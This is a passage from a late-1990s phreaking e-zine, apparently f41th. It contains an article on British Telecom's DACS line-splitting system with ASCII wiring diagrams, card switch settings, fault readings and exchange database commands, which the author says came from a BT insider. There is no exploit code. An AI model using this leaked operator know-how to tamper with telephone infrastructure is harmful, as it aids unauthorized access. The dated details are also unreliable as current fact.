  4612. :
  4613. |
  4614. +----+ GBH -+o
  4615.      |
  4616.      +----> psyclone -+o     +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+-- 
  4617.      +----> hybrid   -+o     +[           GWAHN BURN'IN H4X0RZ          ]+--
  4618.      +----> gr1p     -+o
  4619.      +----> kp       -+o-----+[  _\|/_  ]
  4620.                               |         |
  4621.                               :         :
  4622.                               .         .
  4623.  
  4624. -+[  _\|/_  ]+-+[  _\|/_  ]+-+[  _\|/_  ]+-+[  _\|/_  ]+-[  _\|/_  ]+-[ G ]-+
  4625. -+[  _\|/_  ]+-+[  _\|/_  ]+-+[  _\|/_  ]+-+[  _\|/_  ]+-[  _\|/_  ]+-[ B ]-+
  4626. -+[  _\|/_  ]+-+[  _\|/_  ]+-+[  _\|/_  ]+-+[  _\|/_  ]+-[  _\|/_  ]+-[ H ]-+
  4627.  
  4628. .
  4629. :
  4630. |
  4631. +-+[ digital access carrier system DACS ]+---> by hybrid <-------------------+
  4632. +-+[ D4RKCYDE                           ]+---> hybrid@dtmf.org <-------------+
  4633.                                                                              |
  4634.                                                                              :
  4635.                                                                              .
  4636. BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]
  4637. Digital Access Carrier System DACS
  4638. by hybrid <hybrid@dtmf.org>
  4639.  
  4640.  
  4641.  
  4642. How did I get this info? -- Well the truth is, as a young child I was
  4643. abducted by extra terrestrial biological entitys who hardwired microchips in
  4644. my brain that allow me to intercept the thoughts of telecommunications
  4645. engineers via ESP.. I was told to gather intricate information about the
  4646. planet Earth's international PSTN, so when my people from the distant world
  4647. of xinbin come to inhabit the planet, they can use the information I have
  4648. transmitted to them from the microchips in my brain as a means to take over
  4649. our communication networks... er, shit, thats not rite (better lay off the
  4650. caffiene for a bit).. What I ment to say was, a friend of mine werks for BT,
  4651. and gave me some nice info on DACS :) -werd
  4652.  
  4653.  
  4654. Introduction.
  4655.  
  4656.  
  4657. Digital Access Carrier System is used by British Telecom to transform one
  4658. residential line into two seperate lines without actually installing an
  4659. additional trunk pair. The idea of DACS is very similar to the design and
  4660. implementation of the WB9OO unit used in the past (http://hybrid.dtmf.org/
  4661. files/hybrid-files/wb900.txt). The DACS system is becomming increasingly
  4662. popluar in the UK beacuse more and more people are requesting additional
  4663. lines, usually for net access.
  4664.  
  4665.  
  4666.         Digital Access Carrier System
  4667.  
  4668.  
  4669.                 _____________                    _____________
  4670.     B1         |             |                  |             |        B1
  4671.   -------------O             | single pair of   |             O-------------
  4672.                |             | wires (trunk)    |             |
  4673.     analogue   |     E.U     O==================O     E.U     |   analogue
  4674.                |             | digital          |             |
  4675.   -------------O             |                  |             O-------------
  4676.     B2         |_____________|                  |_____________|        B2
  4677.  
  4678.  
  4679.  
  4680.  
  4681. The chances are, if you order another line from BT, they will simply
  4682. multiplex your existing line into 2 seperate carriers. Think about it.. if
  4683. you have one line operating on a dedicated carrier, then the line is
  4684. multiplexed into 2 serperate carriers, the bandwith will be cut in half. To
  4685. this date, BT are encouraging its customers to join the 'BT SuperHighway' by
  4686. installing a second line.. What BT dont tell you is that you will only be
  4687. able to get a maximum of 28.8bps from your 'second' line.
  4688.  
  4689. In this file, I'll look into the DACS carrier system in detail, aswell as
  4690. ways to determine what kind of trunk installation you have if you have
  4691. ordered a second line from BT. Werd, enjoy the file..
  4692.  
  4693.  
  4694. DACS II
  4695.  
  4696.  
  4697. The origional DACS system had limited capabilitys, and did not allow the
  4698. customer to have CLASS services on their line. The newer DACS implementation
  4699. is called DACS II and allows a slightly more advanced service to customers.
  4700. Now people with DACSII units on their line, have access to CLASS (Customer
  4701. Loop Access Signalling System). The new DACS hardware, allows customers lines
  4702. to have K Break (Disconnect Clear), aswell as common services such as CLI,
  4703. which where previously unavailable to DACS I customers.
  4704.  
  4705.  
  4706. At the eXchange
  4707.  
  4708.  
  4709. All exchanges have a database of different customers who have been fitted
  4710. with the DACS equipment. Some of the commands used on the CSS database at
  4711. the local terminating exchange are as follows:
  4712.  
  4713.         <DFTR> DISPLAY FRAME TERMINATION RANGE (to see if DACS equipment is
  4714.                                                 fitted to the exchange)
  4715.  
  4716.         <DFJ> DISPLAY FRAME JUMPER (to determine whether a particular
  4717.                                     customer is using DACS1 or DACS2)
  4718.  
  4719. Remote End eXchange records
  4720.  
  4721.  
  4722. The Local Network Records (CSS/LNR) are modified/editited as follows on the
  4723. O/S at the exchange:
  4724.  
  4725.         <ESU> ENTER SHARED USE
  4726.         <MSU> MODIFY SHARED USE
  4727.         <DRT> DISPLAY ROUTING
  4728.         <HEH> INVALID COMMAND
  4729.  
  4730. Compatability of DACS:
  4731.  
  4732. GOOD..
  4733.  
  4734. The provision of PSTN services when used with only BABT - approved Customer
  4735. Premises Equipment upto 4 REN.
  4736.  
  4737. Use of any phone exchange within BT's access network, except the following:
  4738.  
  4739.         Inter working with all BT's remote line test systems
  4740.         Self contained payphones
  4741.         Lines utilising CLASS
  4742.         K Break
  4743.         All modems up to 14.4bit/S working
  4744.         Group 1,2,3 fax machines
  4745.         Video phones
  4746.  
  4747. BAD..
  4748.  
  4749. Earth calling PBX's
  4750. Equipment that uses SPM (meter pulsed payphones)
  4751. Private Services
  4752. ISDN2
  4753. Steel joint user poles
  4754. Certain TXE2 exchanges
  4755. 300 kilohms loop calling
  4756. Electricity stations
  4757. DDI
  4758. Group 4 fax machines
  4759.  
  4760.  
  4761.  
  4762. DACS system schematics, diagrams..
  4763.  
  4764.  
  4765.         Old Jumpering Procedure
  4766.  
  4767.  
  4768.                                E             L
  4769.                                :             :
  4770.                 _____________  :             :   _____________
  4771.                |             | :             :  |             |
  4772.                |             O-:-----.     .-:--O             |
  4773.     exchange   |             O-:---. |     | :  |             | external
  4774.   <------------O sub number  | :   | |     | :  |  bar pair   O------------>
  4775.                |             | :   | |     | :  |             | cable
  4776.                |             | :   | |     | :  |             |
  4777.                |_____________| :   | |     | :  |_____________|
  4778.                                :   | |     | :                              
  4779.                                :   | |     | :
  4780.                                :   | |     | :   _____________
  4781.                                :   | |     | :  |             |
  4782.                                :   | |     | :  | DACS block  |
  4783.                                :   | |     | :  |             | DACS shelf
  4784.                                :   | |     | :  |             O------------>
  4785.                                :   | |     | :  |             |
  4786.                                :   | |     | :  | T  B1   B2  |
  4787.                                :   | |     | :  |_____________|
  4788.                                :   | |     | :     o  o    o
  4789.                                    | |     |_______|  |    |
  4790.                                    | |________________|    |
  4791.                                    |_______________________|
  4792.  
  4793.  
  4794.  
  4795.         New Jumpering Procedure
  4796.  
  4797.                                  E          L
  4798.                                  :          :
  4799.                 _____________    :          :    _____________
  4800.                |             |   :          :   |             |
  4801.                |             |   :          :   | DACS B1 B2  |
  4802.     exchange   |             |   :          :   |             | DACS shelf
  4803.   <------------O sub number  |   :          :   |             O------------>
  4804.                |             O---:----------:---|--O B2       |
  4805.                |             O---:----------:---|--O B1       |
  4806.                |_____________|   :          :   |_____________|
  4807.                                  :          :
  4808.                                  :          :
  4809.                                  :          :
  4810.                 _____________    :          :    _____________
  4811.                |             |   :          :   |             |
  4812.                | DACS trunk  |   :          :   |             |
  4813.     DACS shelf |             |   :          :   |             | external
  4814.   <------------O             |   :          :   |  bar pair   O------------>
  4815.                | CH2         |   :          :   |             | cable
  4816.                | CH1      O--O---:----------:---O             |
  4817.                |_____________|   :          :   |_____________|
  4818.                                  :          :
  4819.                                  :          :
  4820.  
  4821.         E.U Card Setup
  4822.  
  4823.  
  4824.     
  4825.                       _________________________________________            
  4826.   .--------.         |             (O) (O) (O)                 |           
  4827.   |        |         |      |   |   |   |   |   |   |   |  on  |           
  4828.   |        |       1 |      |   |   |   |   |   |   |   |  off | 8          
  4829.   |        |         |_____(O)_(O)_____________(O)_(O)_(O)_____|           
  4830.   |        |                                                               
  4831.   |        |                                                               
  4832.   |        | <-- B.E.R connector                                                             
  4833.   |________|                                                               
  4834.                  sw7O9      sw7O3      sw7O6      sw7OO                                         
  4835.                  _____      _____      _____      _____                    
  4836.               c |     |  c |     |  c |     |  c |     |          .--------.
  4837.                 |  :  |    |  :  |    |  :  |    |  :  |          |        |
  4838.                 |  :  |    |  :  |    |  :  |    |  :  |          |        |
  4839.                 |  :  |    |  :  |    |  :  |    |  :  |          |        |
  4840.                 |  :  |    |  :  |    |  :  |    |  :  |          |        |
  4841.               r |_____|  r |_____|  r |_____|  r |_____|          |        |
  4842.                   b2         b1         a3         a1             |        |
  4843.                                                                   |________|
  4844.  
  4845.  
  4846.  
  4847.         DACS 2A EU
  4848.         SW 1O1
  4849.                      (imp)                              (class)
  4850.   _____    _____    _____    _____         _____    _____    _____    _____
  4851.  |     |  |     |  |     |  |     | cpx   |     |  |     |  |     |  |     |
  4852.  |  O  |  |  O  |  |  O  |  |  O  | 6OO   |  O  |  |  O  |  |  O  |  |  O  |
  4853.  |     |  |     |  |     |  |     |       |     |  |     |  |     |  |     |
  4854.  |     |  |     |  |     |  |     |       |     |  |     |  |     |  |     |
  4855.  |     |  |     |  |     |  |     |    en |     |  |     |  |     |  |     |
  4856.  |_____|  |_____|  |_____|  |_____|       |_____|  |_____|  |_____|  |_____|      
  4857.     
  4858.     1        2        3        4             1        2        3        4
  4859.  
  4860.  
  4861.     1   SW 1O2                 4
  4862.   _____    _____    _____    _____
  4863.  | off |  |     |  |     |  |     |      
  4864.  |     |  |     |  |  O  |  |  O  | 1Ok     
  4865.  |     |  | on  |  |     |  |     |      
  4866.  |     |  |     |  |     |  |     |      
  4867.  |  O  |  |  O  |  |     |  |     | 15k      
  4868.  |_____|  |_____|  |_____|  |_____|             
  4869.  
  4870.     1        2        1        2
  4871.  
  4872.      (alarm)            (sign)
  4873.  
  4874.  
  4875.  
  4876.         External RU Setup
  4877.         BT66
  4878.  
  4879.  
  4880.             white
  4881.       B1  O--------------.
  4882.             blue         |    white
  4883.                          | .-------------.
  4884.                          | |  grey       |
  4885.                          | |             |
  4886.                          | |             |
  4887.                          | |             |
  4888.                          | |             |
  4889.                          | |             |
  4890.             white        | |             |
  4891.       B2  O------------. | |             |
  4892.             orange     | | |             |
  4893.                        | | |             |
  4894.                        | | |             |
  4895.                        O O O             |
  4896.                                          |
  4897.                        tail              |  trunk
  4898.                                          O
  4899.  
  4900.         MIMIC Resistances
  4901.  
  4902.                                                switch 5 on (cal)
  4903.                                                1k ohm loop
  4904.                    _____                        _____
  4905.                   |     |                      |     |             
  4906.  C        a       |     |                      |     |         a   ______
  4907.  S       o--------O     |  switch 5 off (ug)   |     O------------O      |
  4908.  S           b1   |     |  10k ohm -50v leg b2 |     |  b1        | NTE  |
  4909.          o--------O     |                      |     O------------O______|      
  4910.  T        b       |     |                      |     |         b 
  4911.  E                |     O======================O     |
  4912.  S                | EU  O======================O RU  |
  4913.  T        a       |     |        TRUNK         |     |         a   ______
  4914.          o--------O     |                      |     O------------O      |
  4915.  A           b2   |     |                      |     |  b2        | NTE  |
  4916.  C       o--------O     |                      |     O------------O______|
  4917.  C        b       |     |                      |     |         b
  4918.  E                |_____|                      |_____|
  4919.  S
  4920.  S       s/c b1 + b2       10k ohm -50v a leg b2    1k ohm loop b1 or b2
  4921.          EU fault          TRUNK fault               customer apps fault
  4922.  
  4923.  
  4924.  
  4925. Welp, thats it for this DACS oday info. Hope someone can find some use of it,
  4926. HEH. Big shouts to gr1p, b4b0, 9x, substance, psyclone & GBH krew, tip, jorge,
  4927. lusta, pbxphreak, bodie, zomba, jasun, oclet, knight, epoc, nou, everyone in
  4928. #darkcyde, #b4b0, #9x HEH, werd to D4RKCYDE.. 2 years going str0ng.
  4929.  
  4930. "that ascii took me fuckin ages.."
  4931.  
  4932. the urls..
  4933.  
  4934. http://b4b0.org                 b4b0
  4935. http://darkcyde.phunc.com       f41th
  4936. http://www.ninex.com            9x
  4937. http://hybrid.dtmf.org          BL4CKM1LK hardcore teleph0n1cs.. (GO NOW!)
  4938.  
  4939. ATE/>exit
  4940. +++
  4941. NO CARRIER
  4942.  
  4943.  
  4944. ------------------------------------------------------------------------------
  4945.  
  4946.  
  4947.                               B L 4 C K M 1 L K
  4948.                                  teleph0nics
  4949.  
  4950.                             FUCKIN HARDCORE, BABY
  4951.  
  4952.                            http://hybrid.dtmf.org/
  4953.  
  4954.  
  4955. ------------------------------------------------------------------------------
  4956.  
  4957. .
  4958. :
  4959. |
  4960. +-+[ outness  ]+---> by jasun <-----------------------------------------------+
  4961. +-+[ D4RKCYDE ]+--->          <----------------------------------------------+
  4962.                                                                              |
  4963.                                                                              :
  4964.                                                                              .
  4965.  
  4966. If you would like to submit an article for publication in f41th, please
  4967. ensure that it complies to the following:
  4968.  
  4969. [ all articles sent to f41th must be original work                 ]
  4970. [ all articles must be at least 15K in size                        ]
  4971. [ all articles must be in pure .txt format                         ]
  4972. [ all articles sent to f41th should not be released anywhere else  ]
  4973.  
  4974. If you are sending us an article that you want to have published in f41th,
  4975. put [ f41th ] in the subject header in enclosed square brackets, all other
  4976. mail without that header will be considered as reader feedback mail and will
  4977. not appear in f41th. Visit #darkcyde on EFnet and idle with the D4RKCYDE
  4978. members, supporters, friends and anyone else who happens to hang out there
  4979. and sometimes chat! Use one of the following addresses to send us comments
  4980. and articles, you may also use the f41th PGP key to send us secure encrypted
  4981. email, which can be found below.
  4982.  
  4983. [ hybrid@dtmf.org              ]
  4984. [ hybrid@ninex.com             ]
  4985. [ zomba@phunc.com              ]
  4986.  
  4987. Type Bits/KeyID    Date       User ID
  4988. pub  2048/4D077481 1999/07/30 f41th <http://darkcyde.phunc.com>
  4989.  
  4990. -----BEGIN PGP PUBLIC KEY BLOCK-----
  4991. Version: 2.6.3ia
  4992.  
  4993. mQENAzehyBUAAAEIALNZc5Ba1zi7JrAAaJEDSXlnyQv4U47OavbwyXyidvUSv4Js
  4994. siVbSAEGlLfGAEgNHgyGHxoJGdMXMoOdFLhlHAT/N6ye4NtaJGloIy34UUPd9+rj
  4995. Cb+Yqz/az/Be56QaexDFSqrcOeOEZPCCNzjzlfW8EN23noHIj42zDppkOcd35VCV
  4996. 0GZ2sZbKqrtfYca1yf0IVe/yoKBVF+TMfftvAO63kJ+rfl5G8t3mU5xbH7fT5UPU
  4997. lrmELJf/372F2RZUCCRwWxdo14ymlSW3QVk7L+DynX7dZ9FNyrQ0Wqpyqh8Anctw
  4998. O8fxYD+59n+ezuuBUomxmSiPIThFEyt4UU0HdIEABRO0IWY0MXRoIDxodHRwOi8v
  4999. ZGFya2N5ZGUucGh1bmMuY29tPokBFQMFEDehyBoTK3hRTQd0gQEBm5IH/0MPx8FO
  5000. Gmc0Epr9Zurk2mx9j77ZsqzvS9AkupTD7uV3UdlVGFNcl8oFUVgpUb5JiM4KuXcv
  5001. 79uGIFfIy0LzCgitjPrl9STjiWHulHfkA9vdY/Tp8K+IFqXaktCagWJV2DNZF/pK
  5002. u26BjNE8T3bUNo+9h9dSvzdobs5Hnj+eks5kdI/A49+hIHsrn5SAyllTL5eIsrei
  5003. 33ZHwrAtu9KnGkV/YZ1a173VW+h715UgXlPtb3xA7WNVcVGQtaAPhRnLBVtDOYgV
  5004. +C98dyjuS0/IgL7ZC+RYz3esvFSiKgJibL/4AU6mXUaOHspCt8d3l/aZ5+z+CKmz
  5005. uaa7MkTM77rWWMM=
  5006. =lLe4
  5007. -----END PGP PUBLIC KEY BLOCK-----
  5008.  
  5009.         #darkcyde EFnet              
  5010.         http://darkcyde.phunc.com
  5011.         [C] D4RKCYDE Communications                
  5012.  
  5013. EOF.
  5014.  
  5015.  
  5016.  
  5017.  
  5018.  
  5019.  
  5020.  
  5021.  
  5022.  
  5023.  
  5024.  
  5025.  
  5026.  
  5027.  
  5028.  
  5029.  
  5030.  
  5031.  
  5032.  
  5033.